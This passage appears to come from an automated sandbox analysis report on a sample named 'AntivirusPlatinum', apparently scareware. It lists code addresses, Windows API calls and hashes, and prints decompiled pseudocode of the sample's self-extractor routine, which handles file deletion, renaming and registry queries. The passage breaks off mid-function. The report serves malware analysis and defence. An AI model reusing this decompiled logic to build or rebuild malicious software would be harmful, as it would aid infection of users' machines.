                                                                                                                                                      0x0040d1b0
                                                                                                                                                      0x0040d1b6
                                                                                                                                                      0x0040d1bb
                                                                                                                                                      0x0040d1c1
                                                                                                                                                      0x0040d1cc
                                                                                                                                                      0x0040d1cc
                                                                                                                                                      0x0040d1d1
                                                                                                                                                      0x0040d1d7
                                                                                                                                                      0x0040d234
                                                                                                                                                      0x0040d234
                                                                                                                                                      0x0040d23a
                                                                                                                                                      0x0040d2c2
                                                                                                                                                      0x0040d2c2
                                                                                                                                                      0x0040d2c3
                                                                                                                                                      0x0040d2c3
                                                                                                                                                      0x0040d2ca
                                                                                                                                                      0x0040d2d0
                                                                                                                                                      0x0040d2d0
                                                                                                                                                      0x0040d2d6
                                                                                                                                                      0x0040d2dc
                                                                                                                                                      0x0040d2e2
                                                                                                                                                      0x0040d2eb
                                                                                                                                                      0x0040d2eb
                                                                                                                                                      0x0040d2f0
                                                                                                                                                      0x0040d2f5
                                                                                                                                                      0x0040d2f7
                                                                                                                                                      0x0040d2f9
                                                                                                                                                      0x0040d2ff
                                                                                                                                                      0x0040d301
                                                                                                                                                      0x0040d302
                                                                                                                                                      0x0040d303
                                                                                                                                                      0x0040d308
                                                                                                                                                      0x0040d309
                                                                                                                                                      0x0040d30b
                                                                                                                                                      0x0040d315
                                                                                                                                                      0x0040d30d
                                                                                                                                                      0x0040d30d
                                                                                                                                                      0x0040d30d
                                                                                                                                                      0x0040d30b
                                                                                                                                                      0x0040d2ff
                                                                                                                                                      0x0040d31b
                                                                                                                                                      0x0040d321
                                                                                                                                                      0x0040d32d
                                                                                                                                                      0x0040d32d
                                                                                                                                                      0x0040d333
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040d333
                                                                                                                                                      0x0040d248
                                                                                                                                                      0x0040d24d
                                                                                                                                                      0x0040d252
                                                                                                                                                      0x0040d254
                                                                                                                                                      0x0040d256
                                                                                                                                                      0x0040d25c
                                                                                                                                                      0x0040d25e
                                                                                                                                                      0x0040d26e
                                                                                                                                                      0x0040d279
                                                                                                                                                      0x0040d279
                                                                                                                                                      0x0040d25c
                                                                                                                                                      0x0040d280
                                                                                                                                                      0x0040d281
                                                                                                                                                      0x0040d287
                                                                                                                                                      0x0040d2b1
                                                                                                                                                      0x0040d2b9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040d289
                                                                                                                                                      0x0040d29b
                                                                                                                                                      0x0040d2a1
                                                                                                                                                      0x0040d2a3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040d2a5
                                                                                                                                                      0x0040d2ab
                                                                                                                                                      0x0040d2ab
                                                                                                                                                      0x0040cf41
                                                                                                                                                      0x0040cf42
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cf42
                                                                                                                                                      0x0040d1d9
                                                                                                                                                      0x0040d1d9
                                                                                                                                                      0x0040d1df
                                                                                                                                                      0x0040d1e4
                                                                                                                                                      0x0040d1f0
                                                                                                                                                      0x0040d203
                                                                                                                                                      0x0040d208
                                                                                                                                                      0x0040d209
                                                                                                                                                      0x0040d209
                                                                                                                                                      0x0040d211
                                                                                                                                                      0x0040d217
                                                                                                                                                      0x0040d219
                                                                                                                                                      0x0040d22f
                                                                                                                                                      0x0040d22f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040d217
                                                                                                                                                      0x0040d1d7
                                                                                                                                                      0x0040cc5e
                                                                                                                                                      0x0040cc6f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cc6f
                                                                                                                                                      0x0040cc64
                                                                                                                                                      0x0040cc65
                                                                                                                                                      0x0040ccdd
                                                                                                                                                      0x0040cce3
                                                                                                                                                      0x0040cce9
                                                                                                                                                      0x0040cd08
                                                                                                                                                      0x0040cd0e
                                                                                                                                                      0x0040cd25
                                                                                                                                                      0x0040cd2b
                                                                                                                                                      0x0040cd2e
                                                                                                                                                      0x0040cd34
                                                                                                                                                      0x0040cd45
                                                                                                                                                      0x0040cd55
                                                                                                                                                      0x0040cd55
                                                                                                                                                      0x0040cd5a
                                                                                                                                                      0x0040cd69
                                                                                                                                                      0x0040cd6c
                                                                                                                                                      0x0040cd77
                                                                                                                                                      0x0040cd79
                                                                                                                                                      0x0040cd8b
                                                                                                                                                      0x0040cd92
                                                                                                                                                      0x0040cd98
                                                                                                                                                      0x0040cd9a
                                                                                                                                                      0x0040cd9e
                                                                                                                                                      0x0040cda1
                                                                                                                                                      0x0040cda3
                                                                                                                                                      0x0040cda5
                                                                                                                                                      0x0040cda8
                                                                                                                                                      0x0040cdaa
                                                                                                                                                      0x0040cdaa
                                                                                                                                                      0x0040cda8
                                                                                                                                                      0x0040cdae
                                                                                                                                                      0x0040cdb3
                                                                                                                                                      0x0040cdb5
                                                                                                                                                      0x0040ce25
                                                                                                                                                      0x0040ce27
                                                                                                                                                      0x0040ce27
                                                                                                                                                      0x0040ce28
                                                                                                                                                      0x0040ce28
                                                                                                                                                      0x0040ce2b
                                                                                                                                                      0x0040cf54
                                                                                                                                                      0x0040cf5d
                                                                                                                                                      0x0040cf63
                                                                                                                                                      0x0040cf6c
                                                                                                                                                      0x0040cf74
                                                                                                                                                      0x0040cf82
                                                                                                                                                      0x0040cf90
                                                                                                                                                      0x0040cf9f
                                                                                                                                                      0x0040cfad
                                                                                                                                                      0x0040cfb2
                                                                                                                                                      0x0040cfb8
                                                                                                                                                      0x0040cfba
                                                                                                                                                      0x0040cfc0
                                                                                                                                                      0x0040cfc2
                                                                                                                                                      0x0040cfc8
                                                                                                                                                      0x0040cfd3
                                                                                                                                                      0x0040cfd3
                                                                                                                                                      0x0040cfc8
                                                                                                                                                      0x0040cfc0
                                                                                                                                                      0x0040cfdb
                                                                                                                                                      0x0040cfe0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cfe0
                                                                                                                                                      0x0040ce31
                                                                                                                                                      0x0040ce37
                                                                                                                                                      0x0040ce39
                                                                                                                                                      0x0040ce39
                                                                                                                                                      0x0040ce41
                                                                                                                                                      0x0040ce41
                                                                                                                                                      0x0040ce47
                                                                                                                                                      0x0040ce49
                                                                                                                                                      0x0040cef0
                                                                                                                                                      0x0040cf0e
                                                                                                                                                      0x0040cf1d
                                                                                                                                                      0x0040cf34
                                                                                                                                                      0x0040cf3a
                                                                                                                                                      0x0040cf3a
                                                                                                                                                      0x0040cf40
                                                                                                                                                      0x0040cf40
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cf40
                                                                                                                                                      0x0040ce5c
                                                                                                                                                      0x0040ce7f
                                                                                                                                                      0x0040ce8b
                                                                                                                                                      0x0040ce94
                                                                                                                                                      0x0040ce97
                                                                                                                                                      0x0040ce9e
                                                                                                                                                      0x0040cea5
                                                                                                                                                      0x0040ceac
                                                                                                                                                      0x0040ceaf
                                                                                                                                                      0x0040ceb6
                                                                                                                                                      0x0040cebd
                                                                                                                                                      0x0040cec0
                                                                                                                                                      0x0040cec3
                                                                                                                                                      0x0040cec9
                                                                                                                                                      0x0040cecb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040ced5
                                                                                                                                                      0x0040cee0
                                                                                                                                                      0x0040cee9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cee9
                                                                                                                                                      0x0040cdb7
                                                                                                                                                      0x0040cdbd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cdbf
                                                                                                                                                      0x0040cdc2
                                                                                                                                                      0x0040ce40
                                                                                                                                                      0x0040ce40
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040ce40
                                                                                                                                                      0x0040cdd7
                                                                                                                                                      0x0040cddd
                                                                                                                                                      0x0040cde6
                                                                                                                                                      0x0040cded
                                                                                                                                                      0x0040cdfd
                                                                                                                                                      0x0040ce02
                                                                                                                                                      0x0040ce05
                                                                                                                                                      0x0040ce07
                                                                                                                                                      0x0040ce09
                                                                                                                                                      0x0040ce0f
                                                                                                                                                      0x0040ce12
                                                                                                                                                      0x0040ce14
                                                                                                                                                      0x0040ce14
                                                                                                                                                      0x0040ce12
                                                                                                                                                      0x0040ce1e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040ce1e
                                                                                                                                                      0x0040cd7b
                                                                                                                                                      0x0040cd7d
                                                                                                                                                      0x0040cd80
                                                                                                                                                      0x0040cd87
                                                                                                                                                      0x0040cd87
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cd87
                                                                                                                                                      0x0040cd82
                                                                                                                                                      0x0040cd85
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cd10
                                                                                                                                                      0x0040cd12
                                                                                                                                                      0x0040cd1c
                                                                                                                                                      0x0040cfe6
                                                                                                                                                      0x0040cfe6
                                                                                                                                                      0x0040cfec
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cff2
                                                                                                                                                      0x0040cff8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040d000
                                                                                                                                                      0x0040d00e
                                                                                                                                                      0x0040d014
                                                                                                                                                      0x0040d019
                                                                                                                                                      0x0040d01c
                                                                                                                                                      0x0040d025
                                                                                                                                                      0x0040d02f
                                                                                                                                                      0x0040d02f
                                                                                                                                                      0x0040d01e
                                                                                                                                                      0x0040d01e
                                                                                                                                                      0x0040d01e
                                                                                                                                                      0x0040d01e
                                                                                                                                                      0x0040d036
                                                                                                                                                      0x0040d044
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040d044
                                                                                                                                                      0x0040cceb
                                                                                                                                                      0x0040cceb
                                                                                                                                                      0x0040ccf1
                                                                                                                                                      0x0040ccf3
                                                                                                                                                      0x0040ccf3
                                                                                                                                                      0x0040ccfd
                                                                                                                                                      0x0040ccff
                                                                                                                                                      0x0040cd00
                                                                                                                                                      0x0040cc9f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cca1
                                                                                                                                                      0x0040cce9
                                                                                                                                                      0x0040cc67
                                                                                                                                                      0x0040cc68
                                                                                                                                                      0x0040cca7
                                                                                                                                                      0x0040ccad
                                                                                                                                                      0x0040ccc1
                                                                                                                                                      0x0040ccc1
                                                                                                                                                      0x0040cccb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cccb
                                                                                                                                                      0x0040ccaf
                                                                                                                                                      0x0040ccb9
                                                                                                                                                      0x0040ccbf
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040ccbf
                                                                                                                                                      0x0040cc6d
                                                                                                                                                      0x0040cc86
                                                                                                                                                      0x0040cc8b
                                                                                                                                                      0x0040cc8d
                                                                                                                                                      0x0040cc99
                                                                                                                                                      0x0040cc99
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cc8d
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • SetDlgItemTextA.USER32 ref: 0040CC99
                                                                                                                                                      • GetDlgItemTextA.USER32 ref: 0040CCDD
                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 0040CD00
                                                                                                                                                      • GetDlgItem.USER32 ref: 0040CD25
                                                                                                                                                      • SendMessageA.USER32 ref: 0040CD45
                                                                                                                                                      • SendMessageA.USER32 ref: 0040CD55
                                                                                                                                                      • SetFocus.USER32(?), ref: 0040CD5A
                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,00000000), ref: 0040CD7B
                                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(?,?,00000000,00000000), ref: 0040CD92
                                                                                                                                                      • GetLastError.KERNEL32(?), ref: 0040CDA3
                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040CDC4
                                                                                                                                                      • wsprintfA.USER32 ref: 0040CDD7
                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,00000001), ref: 0040CE09
                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000400,?), ref: 0040CE5C
                                                                                                                                                      • wsprintfA.USER32 ref: 0040CE7F
                                                                                                                                                      • ShellExecuteExA.SHELL32 ref: 0040CEC3
                                                                                                                                                      • WaitForInputIdle.USER32 ref: 0040CED5
                                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 0040CEE0
                                                                                                                                                      • wsprintfA.USER32 ref: 0040CF0E
                                                                                                                                                      • MessageBoxA.USER32 ref: 0040CF34
                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0040CF42
                                                                                                                                                      • SetDlgItemTextA.USER32 ref: 0040D00E
                                                                                                                                                      • MessageBoxA.USER32 ref: 0040D044
                                                                                                                                                      • SendMessageA.USER32 ref: 0040D06D
                                                                                                                                                      • SendDlgItemMessageA.USER32(?,00000069,00000172,00000000,EC050B71), ref: 0040D086
                                                                                                                                                      • GetDlgItem.USER32 ref: 0040D095
                                                                                                                                                      • GetWindowRect.USER32 ref: 0040D0A5
                                                                                                                                                      • MapWindowPoints.USER32 ref: 0040D0B3
                                                                                                                                                      • SetMenu.USER32(?,00000000), ref: 0040D0C3
                                                                                                                                                      • CreateWindowExA.USER32 ref: 0040D0F5
                                                                                                                                                      • SetMenu.USER32(?,00000067), ref: 0040D107
                                                                                                                                                      • SetWindowPos.USER32(?,?,00000000,00000000,00000000,00000000,00000203), ref: 0040D11B
                                                                                                                                                      • DestroyWindow.USER32(?), ref: 0040D124
                                                                                                                                                      • SendMessageA.USER32 ref: 0040D132
                                                                                                                                                      • SendMessageA.USER32 ref: 0040D141
                                                                                                                                                      • SendMessageA.USER32 ref: 0040D153
                                                                                                                                                      • GetCurrentDirectoryA.KERNEL32(00000400,?), ref: 0040D165
                                                                                                                                                      • GetDlgItem.USER32 ref: 0040D16E
                                                                                                                                                      • SetWindowTextA.USER32(?,00419F92), ref: 0040D18E
                                                                                                                                                      • DialogBoxParamA.USER32 ref: 0040D29B
                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0040D2D0
                                                                                                                                                      • SendMessageA.USER32 ref: 0040D30D
                                                                                                                                                      • SetDlgItemTextA.USER32 ref: 0040D32D
                                                                                                                                                        • Part of subcall function 0040BF99: lstrcmpiA.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,?,?,?,0040D24D,?,00000000,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe), ref: 0040C032
                                                                                                                                                      • PostMessageA.USER32 ref: 0040D315
                                                                                                                                                        • Part of subcall function 00406D54: OleInitialize.OLE32(00000000), ref: 00406D67
                                                                                                                                                        • Part of subcall function 00406D54: #17.COMCTL32 ref: 00406D6D
                                                                                                                                                        • Part of subcall function 00406D54: ShowWindow.USER32(?,00000000,?,?), ref: 00406D86
                                                                                                                                                        • Part of subcall function 00406D54: GetWindowRect.USER32 ref: 00406D9F
                                                                                                                                                        • Part of subcall function 00406D54: GetParent.USER32(?), ref: 00406DB4
                                                                                                                                                        • Part of subcall function 00406D54: MapWindowPoints.USER32 ref: 00406DB9
                                                                                                                                                        • Part of subcall function 00406D54: DestroyWindow.USER32(?), ref: 00406DC7
                                                                                                                                                        • Part of subcall function 00406D54: GetParent.USER32(?), ref: 00406DD5
                                                                                                                                                        • Part of subcall function 00406D54: CreateWindowExA.USER32 ref: 00406DFD
                                                                                                                                                        • Part of subcall function 00406D54: ShowWindow.USER32(00000000,00000005), ref: 00406E0D
                                                                                                                                                        • Part of subcall function 00406D54: UpdateWindow.USER32(?), ref: 00406E12
                                                                                                                                                        • Part of subcall function 0040A205: GetProcessHeap.KERNEL32(00000000,00000000,?,0040DBDA,00000000,00000000,00402BAB,?,00000000,00402C91), ref: 0040A213
                                                                                                                                                        • Part of subcall function 0040A205: RtlFreeHeap.NTDLL(00000000,?,0040DBDA,00000000,00000000,00402BAB,?,00000000,00402C91), ref: 0040A21A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Message$ItemSend$Text$ErrorLastwsprintf$CallbackCreateCurrentDestroyDialogDirectoryDispatcherHeapMenuParentPointsRectShowUser$CountExecuteFileFocusFreeIdleInitializeInputModuleNameParamPostProcessShellSleepTickUpdateWaitlstrcmpi
                                                                                                                                                      • String ID: "%s"%s$-el -s2 "-d%s" "-p%s" "-sp%s"$<$@$@#A$C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe$C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe$LICENSEDLG$P'A$RichEdit$STARTDLG$__tmp_rar_sfx_access_check_%u$|LA
                                                                                                                                                      • API String ID: 3736303233-3498116434
                                                                                                                                                      • Opcode ID: f6039e195e714c08ed0771bd8e5382e57575257739d1cdfff141d797070971d9
                                                                                                                                                      • Instruction ID: f2e0a792357f86b342ab9803b758d3748dbde46f84287d89c15ad3aa3ed67d42
                                                                                                                                                      • Opcode Fuzzy Hash: f6039e195e714c08ed0771bd8e5382e57575257739d1cdfff141d797070971d9
                                                                                                                                                      • Instruction Fuzzy Hash: B3128FB1941209BEDB11AFA0DD85EEE3A6CEB05304F00817AF605F61E1C7B84D56DB6E
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 172 40bf99-40bfaa call 401200 175 40bfb0-40bfd9 call 40b613 172->175 176 40ca5b-40ca5c 172->176 179 40ca5a 175->179 180 40bfdf-40bfe0 175->180 179->176 181 40bfe1-40c001 180->181 182 40c008-40c01b call 40a925 181->182 185 40c01d 182->185 186 40c021-40c03a lstrcmpiA 185->186 187 40c04a-40c04e 186->187 188 40c03c-40c043 186->188 190 40c054-40c057 187->190 191 40ca2a-40ca52 call 40b613 187->191 188->186 189 40c045 188->189 189->191 193 40c313-40c317 190->193 194 40c2f4-40c2f8 190->194 195 40c266-40c26a 190->195 196 40c05e-40c062 190->196 191->181 204 40ca58-40ca59 191->204 193->191 199 40c31d-40c324 193->199 194->191 198 40c2fe-40c30e SetWindowTextA 194->198 195->191 201 40c270-40c27c 195->201 196->191 197 40c068-40c0ea GetCurrentDirectoryA call 40a477 call 4076c8 call 40a5e2 call 405bad call 405bdd call 403556 call 405fad 196->197 277 40c0f0 197->277 278 40c256-40c261 call 405bca 197->278 198->191 199->191 203 40c32a-40c33e 199->203 205 40c289-40c28d 201->205 206 40c27e-40c284 call 40a5e2 201->206 208 40c340 203->208 209 40c346-40c351 call 40a384 203->209 204->179 211 40c297-40c29f call 40b7ba 205->211 212 40c28f-40c295 205->212 206->205 208->209 209->191 225 40c357-40c35b 209->225 215 40c2a1-40c2a3 211->215 212->215 217 40c2a5-40c2a7 215->217 218 40c2a9-40c2b4 call 40a384 215->218 222 40c2b6-40c2d3 call 40a384 call 40a224 217->222 218->222 248 40c2d5 222->248 249 40c2d8-40c2e3 call 40a5e2 222->249 229 40c361-40c365 225->229 230 40c408-40c40a 225->230 229->230 233 40c36b 229->233 234 40c410-40c412 230->234 235 40c36e-40c376 call 40a477 230->235 233->235 238 40c414-40c418 234->238 239 40c41e-40c438 RegOpenKeyExA 234->239 243 40c37b-40c38b call 40a3d9 235->243 238->235 238->239 244 40c469-40c470 239->244 245 40c43a-40c463 RegQueryValueExA RegCloseKey 239->245 257 40c396-40c3e1 call 40a477 call 40b9b0 GetDlgItem SetWindowTextA SendMessageA call 40a4e9 243->257 258 40c38d-40c391 243->258 246 40c472-40c489 call 40a384 244->246 247 40c49c-40c4b8 call 40a384 * 2 244->247 245->244 246->247 265 40c48b-40c497 call 40a5e2 246->265 247->243 275 40c4be-40c4cb call 40a5e2 247->275 248->249 249->191 267 40c2e9-40c2ef call 40a205 249->267 291 40c3e6-40c3e8 257->291 258->257 263 40c393 258->263 263->257 265->247 267->191 275->191 275->243 279 40c0f5-40c10b SetFileAttributesA 277->279 278->191 283 40c111-40c119 call 406ea5 279->283 284 40c1bb-40c1c7 GetFileAttributesA 279->284 283->284 297 40c11f-40c150 call 407300 call 4076c8 call 40a384 283->297 289 40c1c9-40c1d8 DeleteFileA 284->289 290 40c23a-40c250 call 405fad 284->290 289->290 294 40c1da-40c1de 289->294 290->278 290->279 291->191 295 40c3ee-40c403 SendMessageA 291->295 298 40c1e6-40c206 wsprintfA GetFileAttributesA 294->298 295->191 311 40c152-40c161 call 40a384 297->311 312 40c163-40c173 call 407279 297->312 300 40c1e0-40c1e3 298->300 301 40c208-40c21e MoveFileA 298->301 300->298 301->290 303 40c220-40c227 call 406ea5 301->303 303->290 309 40c229-40c234 MoveFileExA 303->309 309->290 311->312 317 40c179-40c1b5 call 40a384 call 40a289 SHFileOperationA 311->317 312->278 312->317 317->284
                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                      			E0040BF99(void* __edx, void* __esi, signed int _a1, struct HWND__* _a4, char _a8, char _a11, signed int _a12) {
                                                                                                                                                      				signed int _v8;
                                                                                                                                                      				char _v9;
                                                                                                                                                      				int _v16;
                                                                                                                                                      				void* _v20;
                                                                                                                                                      				int _v24;
                                                                                                                                                      				struct _SHFILEOPSTRUCTA _v56;
                                                                                                                                                      				char _v568;
                                                                                                                                                      				char _v1080;
                                                                                                                                                      				char _v2103;
                                                                                                                                                      				char _v2104;
                                                                                                                                                      				char _v3127;
                                                                                                                                                      				char _v3128;
                                                                                                                                                      				char _v5176;
                                                                                                                                                      				char _v7223;
                                                                                                                                                      				char _v7224;
                                                                                                                                                      				void* _v8248;
                                                                                                                                                      				char _v9416;
                                                                                                                                                      				char _v12504;
                                                                                                                                                      				void _v13528;
                                                                                                                                                      				char _v16608;
                                                                                                                                                      				char _v17632;
                                                                                                                                                      				char _v21728;
                                                                                                                                                      				char _v25824;
                                                                                                                                                      				char _v29920;
                                                                                                                                                      				void* _v34016;
                                                                                                                                                      				char _v38112;
                                                                                                                                                      				char _v42207;
                                                                                                                                                      				char _v42208;
                                                                                                                                                      				char _v46304;
                                                                                                                                                      				signed int __edi;
                                                                                                                                                      				void* _t235;
                                                                                                                                                      				char _t240;
                                                                                                                                                      				void* _t316;
                                                                                                                                                      				void* _t323;
                                                                                                                                                      
                                                                                                                                                      				_t316 = __edx;
                                                                                                                                                      				_t235 = E00401200(0xb4dc);
                                                                                                                                                      				if(_a8 == 0) {
                                                                                                                                                      					return _t235;
                                                                                                                                                      				}
                                                                                                                                                      				_t240 = E0040B613(0x1000, __esi, _a8,  &_v21728,  &_v7224,  &_v9,  &_a11); // executed
                                                                                                                                                      				_a8 = _t240;
                                                                                                                                                      				if(_t240 == 0) {
                                                                                                                                                      					L157:
                                                                                                                                                      					return _t240;
                                                                                                                                                      				} else {
                                                                                                                                                      					_push(__esi);
                                                                                                                                                      					do {
                                                                                                                                                      						_t323 = GetFileAttributesA;
                                                                                                                                                      						_v8 =  &_v46304;
                                                                                                                                                      						_v16 = 6;
                                                                                                                                                      						goto L4;
                                                                                                                                                      						L6:
                                                                                                                                                      						while(lstrcmpiA( &_v21728,  *(0x4140b8 + _v8 * 4)) != 0) {
                                                                                                                                                      							_v8 = _v8 + 1;
                                                                                                                                                      							if(_v8 < 0xd) {
                                                                                                                                                      								continue;
                                                                                                                                                      							} else {
                                                                                                                                                      								goto L155;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						if(_v8 > 0xc) {
                                                                                                                                                      							goto L155;
                                                                                                                                                      						}
                                                                                                                                                      						switch( *((intOrPtr*)(_v8 * 4 +  &M0040CA61))) {
                                                                                                                                                      							case 0:
                                                                                                                                                      								__eflags = _a12 - 2;
                                                                                                                                                      								if(_a12 != 2) {
                                                                                                                                                      									goto L155;
                                                                                                                                                      								}
                                                                                                                                                      								GetCurrentDirectoryA(0x400,  &_v1080);
                                                                                                                                                      								E0040A477( &_v3128,  &_v1080);
                                                                                                                                                      								E004076C8( &_v3128);
                                                                                                                                                      								E0040A5E2( &_v3128,  &_v7224);
                                                                                                                                                      								E00405BAD( &_v16608);
                                                                                                                                                      								E00405BDD( &_v16608,  &_v3128);
                                                                                                                                                      								E00403556( &_v12504);
                                                                                                                                                      								_push(0);
                                                                                                                                                      								_t314 =  &_v16608;
                                                                                                                                                      								_t265 = E00405FAD( &_v16608, _t316,  &_v12504);
                                                                                                                                                      								__eflags = _t265;
                                                                                                                                                      								if(_t265 == 0) {
                                                                                                                                                      									L29:
                                                                                                                                                      									E00405BCA( &_v16608);
                                                                                                                                                      									goto L155;
                                                                                                                                                      								} else {
                                                                                                                                                      									_t309 = "%s.%d.tmp";
                                                                                                                                                      									do {
                                                                                                                                                      										SetFileAttributesA( &_v12504, 0);
                                                                                                                                                      										__eflags = _v9416;
                                                                                                                                                      										if(_v9416 == 0) {
                                                                                                                                                      											L20:
                                                                                                                                                      											_t270 = GetFileAttributesA( &_v12504);
                                                                                                                                                      											__eflags = _t270 - 0xffffffff;
                                                                                                                                                      											if(_t270 == 0xffffffff) {
                                                                                                                                                      												goto L28;
                                                                                                                                                      											}
                                                                                                                                                      											_t274 = DeleteFileA( &_v12504);
                                                                                                                                                      											__eflags = _t274;
                                                                                                                                                      											if(_t274 != 0) {
                                                                                                                                                      												goto L28;
                                                                                                                                                      											} else {
                                                                                                                                                      												_v8 = _v8 & _t274;
                                                                                                                                                      												_push(_t274);
                                                                                                                                                      												goto L24;
                                                                                                                                                      												L24:
                                                                                                                                                      												wsprintfA( &_v2104, _t309,  &_v12504);
                                                                                                                                                      												_t326 = _t326 + 0x10;
                                                                                                                                                      												_t279 = GetFileAttributesA( &_v2104);
                                                                                                                                                      												__eflags = _t279 - 0xffffffff;
                                                                                                                                                      												if(_t279 != 0xffffffff) {
                                                                                                                                                      													_t66 =  &_v8;
                                                                                                                                                      													 *_t66 = _v8 + 1;
                                                                                                                                                      													__eflags =  *_t66;
                                                                                                                                                      													_push(_v8);
                                                                                                                                                      													goto L24;
                                                                                                                                                      												} else {
                                                                                                                                                      													_t282 = MoveFileA( &_v12504,  &_v2104);
                                                                                                                                                      													__eflags = _t282;
                                                                                                                                                      													if(_t282 != 0) {
                                                                                                                                                      														_t283 = E00406EA5();
                                                                                                                                                      														__eflags = _t283;
                                                                                                                                                      														if(_t283 != 0) {
                                                                                                                                                      															MoveFileExA( &_v2104, 0, 4);
                                                                                                                                                      														}
                                                                                                                                                      													}
                                                                                                                                                      													goto L28;
                                                                                                                                                      												}
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      										__eflags = E00406EA5() - 4;
                                                                                                                                                      										if(__eflags == 0) {
                                                                                                                                                      											goto L20;
                                                                                                                                                      										}
                                                                                                                                                      										E00407300(_t314, __eflags,  &_v1080,  &_v8248);
                                                                                                                                                      										E004076C8( &_v8248);
                                                                                                                                                      										_t293 = E0040A384(_t314,  &_v1080);
                                                                                                                                                      										_v16 = _t293;
                                                                                                                                                      										__eflags = _t293 - 4;
                                                                                                                                                      										if(_t293 < 4) {
                                                                                                                                                      											L18:
                                                                                                                                                      											_t295 = E00407279(_t314,  &_v7224, 0);
                                                                                                                                                      											__eflags = _t295;
                                                                                                                                                      											if(_t295 != 0) {
                                                                                                                                                      												goto L29;
                                                                                                                                                      											}
                                                                                                                                                      											L19:
                                                                                                                                                      											 *((char*)(_t325 + E0040A384(_t314,  &_v12504) - 0x30d3)) = 0;
                                                                                                                                                      											E0040A289(_t314,  &_v56, 0, 0x1e);
                                                                                                                                                      											_push(0x14);
                                                                                                                                                      											_pop(_t300);
                                                                                                                                                      											_v56.fFlags = _t300;
                                                                                                                                                      											_v56.pFrom =  &_v12504;
                                                                                                                                                      											_v56.wFunc = 3;
                                                                                                                                                      											SHFileOperationA( &_v56);
                                                                                                                                                      											goto L20;
                                                                                                                                                      										}
                                                                                                                                                      										_t305 = E0040A384(_t314,  &_v8248);
                                                                                                                                                      										__eflags = _v16 - _t305;
                                                                                                                                                      										if(_v16 > _t305) {
                                                                                                                                                      											goto L19;
                                                                                                                                                      										}
                                                                                                                                                      										goto L18;
                                                                                                                                                      										L28:
                                                                                                                                                      										_push(0);
                                                                                                                                                      										_t314 =  &_v16608;
                                                                                                                                                      										_t272 = E00405FAD( &_v16608, _t316,  &_v12504);
                                                                                                                                                      										__eflags = _t272;
                                                                                                                                                      									} while (_t272 != 0);
                                                                                                                                                      									goto L29;
                                                                                                                                                      								}
                                                                                                                                                      							case 1:
                                                                                                                                                      								__eflags = _a12;
                                                                                                                                                      								if(_a12 == 0) {
                                                                                                                                                      									__eax =  *0x41a81c;
                                                                                                                                                      									__eflags =  *0x41a81c;
                                                                                                                                                      									__ebx = __ebx & 0xffffff00 |  *0x41a81c == 0x00000000;
                                                                                                                                                      									__eflags = __bl;
                                                                                                                                                      									if(__bl == 0) {
                                                                                                                                                      										__eax = E0040A5E2(__eax, "<br>");
                                                                                                                                                      									}
